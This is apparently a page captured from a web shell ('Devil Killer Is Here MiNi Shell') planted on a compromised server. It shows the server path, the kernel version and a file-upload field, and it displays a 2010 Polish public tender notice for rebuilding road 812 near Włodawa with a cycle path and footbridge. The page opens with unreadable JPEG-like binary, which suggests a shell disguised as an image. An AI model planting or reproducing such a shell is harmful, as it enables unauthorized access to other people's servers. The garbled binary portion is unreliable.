JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100408/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100408/97318-N-2010.html

<p class="kh_header"><b>Włodawa: Przebudowa drogi wojewódzkiej Nr 812 w zakresie wykonania ścieżki rowerowej i zatok autobusowych wraz z renowacją odwodnienia od km 78+750 do km 82+195 od m. Włodawa do m. Okuninka wraz z budową kładki pieszo rowerowej.</b><br>
<b>Numer ogłoszenia: 97318 - 2010; data zamieszczenia: 08.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich Lublin Rejon Dróg Wojewódzkich we Włodawie , ul. Lubelska 60, 22-200 Włodawa, woj. lubelskie, tel. 082 5721635, 5721151, faks 082 5721793.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.zdw.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa drogi wojewódzkiej Nr 812 w zakresie wykonania ścieżki rowerowej i zatok autobusowych wraz z renowacją odwodnienia od km 78+750 do km 82+195 od m. Włodawa do m. Okuninka wraz z budową kładki pieszo rowerowej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje:

   1) BRANA DROGOWA

       a) roboty drogowe
   
    - roboty pomiarowe, 
    - karczowanie pni wraz z ich wywiezieniem,
    - zdjęcie warstwy ziemi urodzajnej (humusu) gr. 15 cm,
    - zabezpieczenie istniejącej infrastruktury technicznej,
    -rozebranie krawężników 20x30,
    - rozebranie obrzeży trawnikowych 6x20,
    - rozebranie chodników z płyt bet. 35x35x5,
    - rozebranie ścianki czołowej przepustu rurowego,
    - rozebranie nawierzchni z mas mineralno-bitumicznych gr. 4 cm,
    - rozebranie podbudowy z betonu gr. 15 cm,
    - rozebranie podbudowy z kruszywa gr. 15 cm,
    - transport i utylizacja gruzu,
    - wykonanie nasypów z gruntu pozyskanego,
    - oczyszczanie rowów z namułu gr. 20 cm z wyprofilowaniem dna i skarp,
    - wykonanie przepustów rurowych fi 60 pod zjazdami,
    - przedłużenie istniejących przepustów fi 100,
    - przebudowa przepustu fi 100 pod drogą,
    - wykonanie ścianek czołowych przepustów fi 100,
    - wykonanie podbudowy z gruntu stabilizowanego cementem gr. 15 cm,
    - wykonanie podbudowy z kruszyw łamanych gr. 20 cm,
    - wykonanie nawierzchni z mieszanek mineralno-bitumicznych gr. 5 cm (w-wa ścieralna),
    - umocnienie poboczy  kruszywem łamanym  gr. 10 cm,
    - profilowanie i zagęszczanie podłoża pod w-wy konstrukcyjne (chodnik i ścieżka),
    - wykonanie warstwy odsączającej gr. 10 cm (chodnik i ścieżka)
    - wykonanie warstwy odcinającej gr. 15 cm (zatoka autobusowa i zjazdy),
    - wykonanie podbudowy z gruntu stabilizowanego cementem gr. 10 cm (chodnik 
       i ścieżka),
    - wykonanie podbudowy z gruntu stabilizowanego cementem gr. 16 cm (zjazdy),
    - wykonanie podbudowy z gruntu stabilizowanego cementem gr. 22 cm 
       (zatoka autobusowa),
    - ułożenie krawężników betonowych 15x30 cm z wykonaniem ław betonowych,
    - ułożenie krawężników wtopionych 15x22 cm,
    - wykonanie ławy betonowej z oporem pod obrzeża,
    - ułożenie obrzeży 20x6 cm,
    - ułożenie obrzeży 25x8 cm,
    - wykonanie nawierzchni z betonowej kostki brukowej gr. 6 cm typ Behaton (bezfazowa
       koloru szarego),
    - wykonanie nawierzchni z betonowej kostki brukowej gr. 6 cm typ Behaton (bezfazowa
       koloru rubinowego), 
    - wykonanie nawierzchni z betonowej kostki brukowej gr. 8 cm Behaton szara (zatoka
       autobusowa i zjazdy),
    - plantowanie, humusowanie i obsianie skarp,
      b) stała organizacja ruchu:
 
    - oznakowanie poziome
       - linie segregacyjne i krawędziowe ciągłe,
       - linie na skrzyżowaniach i przejściach dla pieszych,
       - strzałki i inne symbole malowane ręcznie,
    - oznakowanie pionowe:
       - pionowe znaki drogowe - słupki do znaków,
       - pionowe znaki drogowe - znaki zakazu, nakazu i informacyjne o pow. ponad 0,3 m2,
       - pionowe znaki drogowe - znaki zakazu, nakazu i informacyjne o pow. do 0,3 m2,
    - ustawienie urządzeń bezpieczeństwa ruchu - bariery ochronne typ olsztyński
    - sporządzenie powykonawczej dokumentacji geodezyjno-kartograficznej.

2) BRANŻA MOSTOWA

     - wytyczenie obiektu w terenie z pracami geodezyjnymi podczas prowadzenia robót, 
     - rozebranie nawierzchni z płyt drogowych betonowych gr. 12 cm,
     - transport i utylizacja gruzu,
     - wykonanie pali fundamentowych średnicy 600 mm,
     - wykonanie oczepów żelbetowych (zbrojenie i betonowanie),
     - wykonanie konstrukcji pomostu kładki:
        1) montaż prefabrykowanych płyt strunobetonowych typu DS,
        2) montaż zbrojenia prętami o śr. 16-32 mm płyt ustrojów niosących,
        3) montaż prefabrykowanych desek gzymsowych,
        4) betonowanie płyty nadbetonu przy użyciu pompy na samochodzie,
     - elementy wykończeniowe:
        1) wykonanie nawierzchni z żywicy epoksydowej gr. 6 cm,
        2) montaż poręczy stalowych,
     - roboczy wykończeniowe obejmujące:
        1) wykonanie fundamentu umocnienia stożka,
        2) umocnienie stożka nasypowego płytami ażurowymi typu eko,
        3) humusowanie skarp z obsianiem. 

3) BRANŻA TELETECHNICZNA

     - przebudowa sieci kablowej doziemnej:
        a) rozebranie nawierzchni z masy mineralno-bitumicznej gr. 4 cm,
        b) rozebranie chodnika z płyt betonowych 35x35x5,
        c) rozebranie nawierzchni betonowej gr. 12 cm,
        d) wykonanie przepustu z rur dwudzielnych,
        e) przełożenie kabla doziemnego fi 50,
        f) przełożenie kabla doziemnego fi 30,
        g) przestawienie słupków oznaczeniowych SO i SO-K,
        h) montaż zasobnika złączowego.
     - zabezpieczenie sieci kablowej.
        a) ułożenie rur osłonowych A110PS,
        b) ręczne kopanie rowów dla kabli,
        c) ręczne zasypywanie rowów dla kabli,
        d) Uszczelnianie otworów kanalizacji pierwotnej.

2. Szczegółowy zakres robót ujęty jest w projektach budowlanych: 
     1) branży drogowej,
      2) branży mostowej, 
      3) branży teletechnicznej,
    przedmiarach robót oraz Szczegółowych Specyfikacjach Technicznych Wykonania i Odbioru
    Robót.
    Zamówienie należy wykonać zgodnie z projektami budowlanymi i Szczegółowymi
    Specyfikacjami Technicznymi:  D.00.00.00, D.01.00.00, D.01.01.01, D.01.02.02, 
    D.01.02.04, D.02.00.00, D.02.01.01, D.02.03.01, D.03.00.00, D.03.01.01, D.04.00.00,
    D.04.01.01, D.04.02.01, D.04.05.01, D.05.00.00, D.05.02.01, D.05.03.05, D-05.03.23,
    D.06.00.00, D.06.01.01, D.07.00.00, D.07.01.01, D.07.02.01, D.07.05.01, D.08.00.00,
    D.08.01.01, D.08.02.00, D.08.03.01, D.10.00.00, D.10.05.01, D.10.06.01, D.10.07.01, 
    M-21.53.02.11, M-11.03.00, M-23.05.01.81, M-23.10.01.00, M-23.10.01.97, 
    M-23.30.06.00, M-23.30.06.55, M-23.30.06.97, M-27.01.01.00, M-28.01.01.00, 
    M-29.03.01.00, M-29.15.01.00, M-30.05.02.51. 
3. Wykonawca jest zobowiązany do zapewnienia obsługi geodezyjnej podczas prowadzenia
    robót i sporządzenia powykonawczej inwentaryzacji geodezyjnej przez upoważnioną 
    jednostkę geodezyjną zgodnie z  §19, §20 i §21 Rozporządzenia Ministra Gospodarki
    Przestrzennej i Budownictwa z dnia 21 lutego 1995 r. w sprawie rodzaju i zakresu 
    opracowań geodezyjno-kartograficznych oraz czynności geodezyjnych obowiązujących w
    budownictwie (Dz. U. Nr 25 1995 r. poz. 133).
4. Okres rękojmi za wady dla robót objętych zamówieniem wynosi 3 lata od daty odbioru 
    ostatecznego
5. Ponadto Wykonawca zobowiązany jest do: 
    1)  zapoznania się w terenie przed złożeniem oferty z miejscem wykonywania robót w celu
         dokonania oceny dokumentów i informacji przekazanych w ramach niniejszego postępowania,
    2)  zapewnienia bezpiecznych warunków ruchu drogowego kołowego i pieszego, 
         w rejonie prowadzonych robót objętych umową, na podstawie 
         projektu organizacji ruchu ( na czas prowadzonych robót ) zatwierdzonego przez 
         Zarządzającego ruchem na drogach wojewódzkich tj. Dyrektora ZDW w Lublinie.
3)	opracowania harmonogramu rzeczowo-finansowego robót, programu zapewnienia
      jakości PZJ, i przedłożenia ich do  Akceptacji  Zamawiającemu przed
     przystąpieniem  do wykonywania robót.
    4) zgodnie z warunkiem 5.3. (Warunków do umowy) Wykonawca ma obowiązek zawarcia
        umowy/umów ubezpieczenia na wartość nie niższą niż wartość kontraktu.
6. Zgodnie  z  art. 30 ust. 4 ustawy, Zamawiający dopuszcza rozwiązania
    równoważne  opisywanym.   Wykonawca, który powołuje się na rozwiązania równoważne
    opisywanym  przez  Zamawiającego jest obowiązany wykazać, że oferowane roboty
    budowlane spełniają   wymagania określone przez Zamawiającego (art.. 30, ust.. 5 ustawy)
Szacunkowa wartość zamówienia netto - 2458724,30 PLN.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.11.00.00-1, 45.11.30.00-2, 45.23.20.00-2, 45.23.31.40-2, 45.23.33.40-4, 45.23.32.00-1, 45.23.31.50-5, 45.23.23.10-8, 45.11.12.20-6, 45.26.22.10-6, 45.26.26.00-7, 45.26.23.11-4, 45.26.23.11-4, 45.26.33.11-4, 45.26.22.12-0, 45.45.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Warunkiem uczestnictwa w przetargu jest wniesienie wadium w wysokości 50 000,00zł 
    (pięćdziesiąt  tysięcy złotych 00/100)
2. Wadium może być wnoszone w formach określonych w art. 45, ust. 6 ustawy Prawo zamówień publicznych.
Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na rachunek bankowy 
    w    Kredyt Banku S.A. O/Lublin Nr 89 1500 1520- 1215 2004 1596 0000
    W myśl art. 63 ust. 3 pkt 1 ustawy Prawo bankowe z dnia 29 sierpnia 1997 r. 
   (Dz. U. z 2002 r. nr 72 poz. 665 j. t.) polecenie przelewu jest jedną z form rozliczenia
    bezgotówkowego. Zgodnie z art. 63c Prawa bankowego polecenie przelewu stanowi 
   udzieloną bankowi dyspozycję dłużnika obciążenia jego rachunku określoną kwotą i
   uznania tą kwotą rachunku wierzyciela. 
   Oznacza to, że wpłata gotówkowa wadium wnoszona na poczcie lub w banku nie stanowi
   polecenia przelewu w rozumieniu wyżej cytowanych artykułów.
 Wadium wnoszone przelewem (art.45 ust. 7 ustawy Pzp) uważa się za wniesione w
   terminie jeżeli wpłynie na konto Zamawiającego przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2)	Na potwierdzenie spełniania warunków posiadania wiedzy i doświadczenia 
Wykonawca winien wykazać się wykonaniem w ciągu ostatnich pięciu lat przed wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie minimum 2 robotami budowlanymi obejmującymi wykonanie nawierzchni z betonowej kostki brukowej, o wartości nie mniejszej niż 1 800 000 zł każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dysponowania potencjałem technicznym
          niezbędnym do wykonania zamówienia Wykonawca winien dysponować wymienionymi
          poniżej jednostkami sprzętu i środkami transportu:
          1) koparka o pojemności łyżki 0,25 m3 i więcej 					- 1 szt.
          	2) ładowarka o pojemności łyżki 0,5 m3	i więcej				- 1 szt.
          	3) Równiarka o mocy 75 KM							- 1 szt.
          	4) Samochód samowyładowczy o ładowności 5 t lub więcej			- 2 szt. 
        	5) Samochód ciężarowy samowyładowczy o ładowności min. 10 Mg 	- 2 szt.
               (z możliwością przykrycia brezentem)
           6) zestaw wiertniczy 								- 1 szt.
           7) żuraw samochodowy do 15 t 							- 1 szt.
          	6) żuraw samochodowy o udźwigu 5-6 t						- 1 szt.
           7) zagęszczarki spalinowe								- 4 szt.
        	8) spycharka o mocy 75 KM 							- 1 szt.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dysponowania osobami zdolnymi do wykonania
          zamówienia Wykonawca winien dysponować minimum jedną osobą, przewidzianą do
          pełnienia funkcji:          
           a) kierownika budowy - posiadającą min. 3 letnie doświadczenie w pracy na
               stanowisku kierownika budowy/robót posiadającą uprawnienia budowlane branży
               drogowej, 
           b) kierownika robót - posiadającą min. 2 letnie doświadczenie w pracy na stanowisku
               kierownika robót/budowy posiadającą uprawnienia branży mostowej, instalacyjnych
               w zakresie sieci teletechnicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oprócz oświadczeń i dokumentów jakie należy dostarczyć w celu potwierdzenia
    spełniania warunków udziału w postępowaniu, Wykonawca obowiązany jest dołączyć 
    do oferty:
      1) Dowód wniesienia wadium.
      2) Ofertę przetargową (z ceną netto i z podatkiem VAT), wraz z 
          kosztorysem ofertowym obejmującym wszystkie branże (drogową, mostową i
          teletechniczną),
      3) Wstępny harmonogram robót,
      4) Zaakceptowany wzór umowy  i warunków do umowy, 
      5) Wykaz części zamówienia których wykonanie Wykonawca zamierza zlecić
          podwykonawcy, 
      6) W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia, 
           do oferty należy   załączyć   dokument   (np. odpowiednią  umowę) ustanawiający 
          pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia
          albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia
          publicznego zgodnie z art. 23 ust. 1 i 2 ustawy Prawo zamówień publicznych.
      7) W przypadku podpisania oferty i innych dokumentów przez osobę/osoby, które 
          nie są  wymienione w odpisie z właściwego rejestru do oferty należy załączyć dokument
          potwierdzający prawo do reprezentowania podmiotu przez osobę /osoby podpisujące ofertę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty polegających na:
1.  Zmiany rozwiązań w dokumentacji technicznej wykonania zamówienia 
a)	na wniosek Wykonawcy, za zgodą Zamawiającego w trakcie wykonywania zamówienia mogą być dokonywane zmiany technologii wykonywania elementów robót. Dopuszcza się je tylko w przypadku gdy, proponowane przez niego rozwiązanie jest równorzędne lub lepsze funkcjonalnie od tego, jakie przewiduje dokumentacja techniczna a Wykonawca nie będzie żądał zwiększenia wynagrodzenia za wykonane roboty.
W tym przypadku Wykonawca przedstawia projekt zamienny zawierający opis proponowanych zmian wraz z rysunkami. Projekt wymaga uzgodnienia z inspektorem nadzoru i akceptacji Zamawiającego.
Powyższe zmiany nie powodują zmiany terminu zakończenia robót.
b)	w uzasadnionych przypadkach gdy realizacja zadania według dokumentacji
     technicznej i SST powodowałoby wadliwe wykonanie przedmiotu umowy dopuszcza
     się wprowadzenie zmian w stosunku do dokumentacji technicznej bez zmiany terminu
     zakończenia robót.
2.  Zmiany terminu zakończenia wykonania robót o czas niezbędny do ich zakończenia gdy 
     wystąpi którakolwiek z wymienionych poniżej okoliczności: 
     1) klęski żywiołowe jak: huragany, powodzie, trzęsienia ziemi,
     2) bunty, niepokoje, strajki, okupacje budowy przez osoby inne niż pracownicy
         Wykonawcy i jego Podwykonawców
     3) warunki atmosferyczne:
         a) gdy warunki atmosferyczne odbiegają od określonych w SST do prowadzenia robót
              budowlanych, uniemożliwiają przeprowadzenie prób i sprawdzeń oraz
              dokonywanie odbiorów.
3.  Zmiany osobowe
     a) zmiana osób wymienionych w ofercie, przewidzianych do wykonywania samodzielnych
         funkcji przy realizacji robót na inne, których kwalifikacje i zdolności będą takie
         same lub wyższe niż wymienionych w ofercie.
4.  Zamawiający dopuszcza możliwość wyrażenia zgody na wykonywanie robót przez
podwykonawców nie wskazanych w ofercie lub zakres nie wskazany w ofercie jako
planowany do powierzenia podwykonawcom. Zmiana taka nie wymaga aneksu do
umowy i może być przeprowadzona przy zachowaniu procedury zatwierdzenia
podwykonawców wynikającej z przepisów prawa i SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
